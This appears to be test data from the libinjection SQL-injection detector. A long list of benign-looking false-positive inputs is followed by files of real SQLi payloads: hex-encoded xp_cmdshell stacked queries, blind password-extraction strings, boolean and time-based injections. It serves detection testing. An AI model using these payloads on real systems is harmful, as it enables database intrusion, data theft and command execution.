||||
5-DEC-QRIBMKCDNBUO2ELCW2FGFI
|
||||
WOMEN';S ART DEC
|
||||
DO OR NOT DO, THERE IS NO
|
||||
ABC AND 123 WALL DEC
|
||||
1.5 WITH 1/2 INCH LOOP END
|
||||
"NOT FOR SALE"
|
||||
"IS" STAMP
|
||||
"LIKE" STAMP
|
||||
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
|
||||
1950' AND 60'S WOMEN'S COATS WITH FAKE
|
||||
FOO; BAR 1+2+3
|
||||
WO;DCAT[JPTPGRA][
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2
|
||||
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2
|
||||
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2
|
||||
KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR
|
||||
0=[]'
|
||||
"AS FOR ME AND MY
|
||||
"EXIT, PURSUED B
|
||||
"EXIT, PURSUED BY
|
||||
4%27%2BX%2B4%27%2BWOOD
|
||||
48%22%2BX%2B48%22%2BMODERN%2BART
|
||||
90-%2B6%2BINCH
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4
|
||||
%2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY
|
||||
%2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE
|
||||
%2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY
|
||||
HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29
|
||||
RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22
|
||||
%22MOD%22%20%22
|
||||
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14
|
||||
/SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
DO%20OR%20NOT%20DO
|
||||
DO%20OR%20NOT%20DO%2C
|
||||
9%216%2BEARINGS
|
||||
%22NOT+GAY+AS+I
|
||||
%22+-+%22MAGAZINE%22
|
||||
FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21
|
||||
RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E
|
||||
FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/...
|
||||
%27-%228
|
||||
%27-%228%20TRACK%22
|
||||
%27-%228%20TRACK%20PL
|
||||
2%20got%20%40AOL.COM
|
||||
L%3BIN%20TABLE%20RUNNER
|
||||
OW%3BCAST%20IRON%20TRIVETS
|
||||
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
SET%208%20-MINI%20AS
|
||||
1/4%22-1/2RIBBON
|
||||
1/4%22-1/RIBBON
|
||||
PHILLIPKEEGAN-777-%40HOTMAIL.COM
|
||||
AUG%2B15%2BKEYS
|
||||
%22foo%22+AND+%22bar%22+AND
|
||||
%22foo%22+AND+%22bar%22
|
||||
%22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22
|
||||
%22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22
|
||||
FOO+BAR%27%23+BLAH
|
||||
5%2F8%2BLOOP
|
||||
CONNECTORS+%2B+2-PRONG
|
||||
50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
|
||||
50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29
|
||||
32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER
|
||||
25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
|
||||
%281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS
|
||||
%22CROSS+STITCH%22+%2B+%22TREE+SKIRT
|
||||
%2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6
|
||||
%2BIPHONE%2B4%2BCASE
|
||||
%22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO.
|
||||
%22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22
|
||||
%22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT
|
||||
4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
THING%2B1%2BAND%2BTHING%2B2
|
||||
1Q9D819XMTILZVG1BOBY27-4-ROW
|
||||
NOT+AS+SAD+AS+I+USED+TO+BE
|
||||
NOT+AS+SAD+AS+I
|
||||
IPHONE%2B4%2BCASE%2BRUSSIAN
|
||||
COPPER%2B20%2BROUND
|
||||
CASE+FOR+KINDLE+WITH+KEYBOARD
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27
|
||||
BIRTHDAY%2B12%2BMONTH%2B
|
||||
6R2OS3JNSM-48-IN-0ZENVYLUJJL
|
||||
14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS
|
||||
XVPG_TLIHBUY60_ZHXPSA-4-PI-P
|
||||
GALLERY%3D1%3D5
|
||||
I+%3C3+%3C3
|
||||
I+%3C3+%3C3+THE+DOCTOR
|
||||
SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT
|
||||
4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C
|
||||
-3-B39RBBO58YMVIHEVAUZBS-6TF
|
||||
.75+%22+X+1.5%22
|
||||
"SIGNAL LOCK"
|
||||
3 TABLE LAMP WITH FLOWERS
|
||||
9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM
|
||||
1950 UNION MADE
|
||||
EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224
|
||||
1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON
|
||||
3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER
|
||||
SHELL IS 65 AND 35 POLY COTTON BLEND
|
||||
Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283
|
||||
5EOR-5MDKFIKK50HAHCPYPUVLG-2
|
||||
LISTING-PRICE"> P="L TING-PRICE"> <A-TRIGVORITE LISTING-FAVORITE INNNNN SHABBY CHIC CREAM CURTAINS VINTAGE CURTAI RIG <IMG SRC=
|
||||
5683190/TARGET="_BLANK"
|
||||
3 TRAILING AIRPLANES WITH YOUR NAME DECAL
|
||||
SUKAN / SET (2 PIECE) HAND WOVEN ORIGINAL SILK
|
||||
|
||||
# some base64 things?
|
||||
zzh7W_krs4jSNwVV2TssQsSbOj--
|
||||
1611-IioXXIG1ti8rspL2vbXFy--
|
||||
1611/IioXXIG1ti8rspL2vbXFy--
|
||||
|
||||
Mosaic "Table top"
|
||||
|
||||
# Used in HTTP headers, e.g. Accept: */*
|
||||
*/*
|
||||
"Dr. Who" and coffee
|
||||
"rose gold" necklace 14
|
||||
"flagging" -american -festive --peace -prayer -america -stripes -straws
|
||||
shabby "and white
|
||||
|
||||
"3 1'/3
|
||||
"*"
|
||||
necklace length 16" or 18"
|
||||
4 pcs- (5003-BK) 14mm Black
|
||||
"Keys"
|
||||
"dec"
|
||||
'countdown calendar" and "disney:
|
||||
1950 or 1960
|
||||
black and "shower curtain"
|
||||
dad and keychain and "loved by"
|
||||
if all else fails call grandma
|
||||
case 13"
|
||||
12.5 x 12.5"
|
||||
|
||||
O'connors UNION selected a few friendsf from a
|
||||
O'connors UNION selected a few friendsf from
|
||||
O'connors UNION selected a few friendsf fr
|
||||
O' UNION selected a few friends
|
||||
O'connors UNION selected a few friends
|
||||
1 I like having true friends
|
||||
I like having true friends
|
||||
I having true friends
|
||||
I was having true friends
|
||||
1 having
|
||||
|
||||
"1--"
|
||||
'1--'
|
||||
"1--
|
||||
'1--
|
||||
|
||||
1 collate these union documents
|
||||
17+inch+PC+LAPTOP+Sleeve%2FBag%2FCase+with+zipper+pocket+and+adjustable+strap
|
||||
|
||||
# from https://github.com/client9/libinjection/issues/49
|
||||
1,(1)
|
||||
Toronto, ON, Canada - (YYZ)
|
||||
1,1--
|
||||
(1)-x
|
||||
1 function (1)
|
||||
'/1x-
|
||||
# technically x OR 1
|
||||
#x|x||1
|
||||
select 'and'
|
||||
x/void(1)
|
||||
select x from y where
|
||||
x/*
|
||||
1x(((
|
||||
1),(1
|
||||
x, @x, @x
|
||||
|
||||
#
|
||||
1; exec will create the case 7
|
||||
`
|
||||
1234`
|
||||
junk <a href="../">foo.com</a>
|
||||
|
||||
|
||||
# bogus
|
||||
1alert(1)
|
||||
|
||||
foo 'null' bar
|
||||
User(foo),junk
|
||||
User(login_name),Images(url_170x135)
|
||||
mr and mrs table sign
|
||||
USPS 1-3 Day (USPS doesn't guarantee 3 day arrival)
|
||||
foo or bar add 1
|
||||
Apt is gated; call when you get here, and we'll come down to get it.
|
||||
DaVi - Open and Close Your Blinds With Your Phone!
|
||||
Foo and 80's Foo / Bar
|
||||
Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended
|
||||
Same as reward #1 however
|
||||
foobar sent you 1 message about
|
||||
4.7" & iPhone 6 Plus 5.5
|
||||
Family and friends having meal outdoors
|
||||
<table width="99%" border="0" cellpadding="1"'
|
||||
8-bit Limit (BRK)
|
||||
3rd space(s)
|
||||
Ink and White Out 2 in 1 Pen
|
||||
Reality check (2016)
|
||||
Please select pair #1
|
30
libinjection/data/sqli-@ru_raz0-20160705.txt
Normal file
30
libinjection/data/sqli-@ru_raz0-20160705.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# https://twitter.com/ru_raz0r/status/750311113435283456
|
||||
#
|
||||
username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test'
|
||||
username'declare @s varchar (8000); ...
|
||||
username'DECLARE @find varchar(30) = 'Man%'
|
||||
'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end
|
||||
'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch--
|
||||
'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch--
|
||||
'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end
|
||||
'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end--
|
||||
'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
11
libinjection/data/sqli-arithmetic_blind_sqli.txt
Normal file
11
libinjection/data/sqli-arithmetic_blind_sqli.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Not sure of original source
|
||||
# attributed to David Litchfield
|
||||
#
|
||||
234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29
|
||||
foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29--
|
||||
|
||||
456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10
|
||||
foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10--
|
||||
|
||||
# overflow
|
||||
123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29
|
73
libinjection/data/sqli-arithmetic_variations.txt
Normal file
73
libinjection/data/sqli-arithmetic_variations.txt
Normal file
|
@ -0,0 +1,73 @@
|
|||
|
||||
# samples
|
||||
# unlikely to execute correctly
|
||||
# probably just generated automatically without regard for usefulness
|
||||
# but seen in wild "FIELD AND NUM=NUM"
|
||||
|
||||
# FAILS
|
||||
#"1*HOPE AND 8=3",
|
||||
#"0+HOPE AND 8=3",
|
||||
#"0+(HOPE) AND 8=3",
|
||||
HOPE%2A1+AND+8%3D3
|
||||
## HOPE%2A%281%29+AND+8%3D3
|
||||
|
||||
# RHS variations
|
||||
HOPE+AND+8%3D3
|
||||
HOPE+AND+-8%3D3
|
||||
HOPE+AND+-8%3D-3
|
||||
HOPE+AND+%28-8%29%3D%28-3%29
|
||||
HOPE+AND+%288%29%3D3
|
||||
HOPE+AND+8%3D%283%29
|
||||
HOPE+AND+%288%29%3D%283%29
|
||||
HOPE+AND+1%2B2%3D3%2B4
|
||||
HOPE+AND+COS%283%29%3DSIN%284%29
|
||||
|
||||
# lhs work arounds
|
||||
HOPE%2A1+AND+8%3D3
|
||||
## HOPE%2A%281%29+AND+8%3D3
|
||||
%28HOPE%29+AND+8%3D3
|
||||
%28HOPE%29%2A1+AND+8%3D3
|
||||
%28HOPE%29%2B0+AND+8%3D3
|
||||
1%2A%28HOPE%29+AND+8%3D3
|
||||
%281%29%2A%28HOPE%29+AND+8%3D3
|
||||
%281%29%2AHOPE+AND+8%3D3
|
||||
%28%281%29%29%2AHOPE+AND+8%3D3
|
||||
%28%281%29%29%2A%28HOPE%29+AND+8%3D3
|
||||
%28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3
|
||||
%28%28%281%29%29%29%2AHOPE+AND+8%3D3
|
||||
%28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3
|
||||
|
||||
# based on NUM AND 1=1--
|
||||
PI%28%29+AND+COS%28PI%28%29%29%3D-1
|
||||
PI%28%29+%26%26+COS%28PI%28%29%29%3D-1
|
||||
FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0
|
||||
-9-%282%29+OR+1+%3D+1
|
||||
8-9+OR+1+%3D+1
|
||||
-9-%282%29+OR+1+%3D+1
|
||||
-9-%28%282%29%29+OR+1+%3D+1
|
||||
-9-%28%28%282%29%29%29+OR+1+%3D+1
|
||||
%7E9-%282%29+OR+1+%3D+%7E1
|
||||
a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29--
|
||||
a%27%2712%27+and+pi%28%29%3Dpi%28%29--
|
||||
dingberry%27%271%27+and+%28false%29--
|
||||
dingberry%27%271%27+and+%28pi%28%29%3D3%29--
|
||||
dingberry%27%271%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2712%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%2712%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
|
||||
1%2Bpi%28%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29--
|
||||
1234%27%27z%27+and+%283%3Dpi%28%29%29--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3--
|
||||
foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3--
|
15
libinjection/data/sqli-arneswinnen.net-boolean.txt
Normal file
15
libinjection/data/sqli-arneswinnen.net-boolean.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
#
|
||||
# from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
|
||||
#
|
||||
999999 or 1=1 or 1=1
|
||||
' or 1=1 or '1'='1
|
||||
" or 1=1 or "1"="1
|
||||
999999) or 1=1 or (1=1
|
||||
') or 1=1 or ('1'='1
|
||||
") or 1=1 or ("1"="1
|
||||
999999)) or 1=1 or ((1=1
|
||||
')) or 1=1 or (('1'='1
|
||||
")) or 1=1 or (("1"="1
|
||||
999999))) or 1=1 or (((1
|
||||
'))) or 1=1 or ((('1'='1
|
||||
"))) or 1=1 or ((("1"="1
|
44
libinjection/data/sqli-arneswinnen.net-time.txt
Executable file
44
libinjection/data/sqli-arneswinnen.net-time.txt
Executable file
|
@ -0,0 +1,44 @@
|
|||
#
|
||||
# http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
|
||||
#
|
||||
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
|
||||
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
|
||||
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
|
||||
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
|
||||
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
|
||||
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
|
||||
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
|
||||
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
|
||||
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
|
||||
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
|
||||
(select like('abcdefg',upper(hex(randomblob(150000000)))))
|
||||
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
|
||||
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
|
||||
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
|
||||
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
|
||||
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
|
||||
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
|
||||
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
|
||||
benchmark(15000000,md5(0x4e446b6e))-9999
|
||||
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
|
||||
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
|
||||
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
|
||||
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
|
||||
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
|
||||
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
|
||||
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
|
||||
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
|
||||
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
|
||||
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
|
||||
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
|
||||
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
